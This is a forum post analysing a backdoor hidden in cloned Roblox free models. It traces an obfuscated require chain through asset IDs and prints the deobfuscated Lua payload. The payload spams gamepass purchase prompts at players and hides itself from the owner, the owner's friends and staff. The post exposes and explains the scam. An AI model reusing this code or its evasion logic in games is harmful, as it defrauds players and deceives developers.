Viruses / backdoors
I think you’ve already heard about some cloned plugins / free models
and you are maybe already know about the viruses and backdoors
the most basic ones dont even care about nor hiding the scripts nor hiding the creators
but there’s more dangerous type that hard to detect
it’s still a virus but it’s hidden in the depth of the script somewhere with ~200 spaces and this
that is the image of one of the victims of that kind of virus
let’s look how it works inside
- first this getfenv() thing just means require if you run the code
so what are we interested in is following the id (5758303792)
usually it’s the chain of ids
something like
- 5758303792 - another id - another id - another id - … real script
that means they just make it hard to find
each script in chain just requires the other
at the end one user helped me with that and found the final id
- 9704956167
Instruction
btw small instruction how to get the module by id
you just go to the creator store and paste the id
https://create.roblox.com/store/asset/[ID HERE]
you getting on the page and just downloading the file
Page:
Download button:
and you can drop it in the place
Uncovering creator
Back to uncovering the truth
you will get the script that looks like that
MainModule:
the structure looks like that
- long ofuscated code (“the long part my guess is just decrypting the obfuscated code and the short part is the real code”)
- custom lua loadstring
what we are searching is in the main module and luckily we dont have to search for long in that case
because the owner gave it to us at the start
as we follow that, we will get to the main script
then again it is the same layout
looks the same right?
but the things will get way easier from now on
MainModule:
now finally we can read something!
the script just combines the descriptions of 2 gamepasses and executes them in the parser
we can simply run the checks and look what the actual code looks like
spawn(function()
local Players, MarketService, GamepassIds, Time, GameCreatorType, GameCreatorId = game:GetService("Players"), game:GetService("MarketplaceService"),
{107584795, 107584737}, "############### ##### #################", game.CreatorType, game.CreatorId
function ShouldWePrompt(plr)
if GameCreatorType == Enum.CreatorType.User then
if plr:IsFriendsWith(GameCreatorId) or plr.UserId == GameCreatorId then
return false
end
elseif GameCreatorType == Enum.CreatorType.Group then
local Role = plr:GetRoleInGroup(GameCreatorId)
local role = tostring(Role):lower()
if role:find("admin") or
role:find("owner") or
role:find("chairman") or
role:find("dev") or
role:find("creator") or
role:find("vice") or
role:find("alt") or
role:find("barista") or
role:find("senior") or
role:find("mod") or
role:find("staff") or
role:find("assistant") or
role:find("trainee") or
role:find("ally") or
role:find("allied") or
role:find("allies") or
role:find("manag") or
role:find("contrib") or
role:find("officer") or
role:find("hold") or
role:find("partner") or
role:find("manage") or
role:find("intern") or
role:find("supervis") or
role:find("coord") or
role:find("exec") or
role:find("cook") or
role:find("chef") or
role:find("cashier") or
role:find("shift") or
role:find("lead") or
role:find("pres") or
plr:GetRankInGroup(GameCreatorId) > 200 then
return
false
end
end
return
true
end
function Prompt(plr)
spawn(function()
for i = 1, 10 do
for i,v in pairs(GamepassIds) do
if not MarketService:UserOwnsGamePassAsync(plr.UserId,v) then
MarketService:PromptGamePassPurchase(plr,v)
if plr.MembershipType == Enum.MembershipType.Premium then
wait(Time/2)
else wait(Time)
end
end
end
end
end)
end
Players.PlayerAdded:Connect(function(Player)
if ShouldWePrompt(Player) then
Prompt(Player)
end
end)
for i,Player in pairs(Players:GetPlayers()) do
if ShouldWePrompt(Player) then if ######################################################### then
else Prompt(Player)
end
end
end
end)
and quickly analizing the code you can see that it spams 2 gamepasses
explanation of following code
when player joins, it spams with 2 gamepasses
but before that it checks if the game was created under the group or by the player
Group
- if you are the owner
- if by the group it checks whether you have a specific text in your group role
- if the role value is higher than 200
- if you are friends with the owner
Player
- if you are the owner
- if you are friends with the owner
and then prompts the gamepasses if all of the above if false
Discovery
The creator used a lot of alts to publish the scripts / passes
And the group who owns these gamepasses is Million Dollar Circle - Roblox
Thanks for the attention!
Hopefully roblox moderation can make investigation on that one!
Have you uncovered some of the virus creators?
If yes can you share your own story?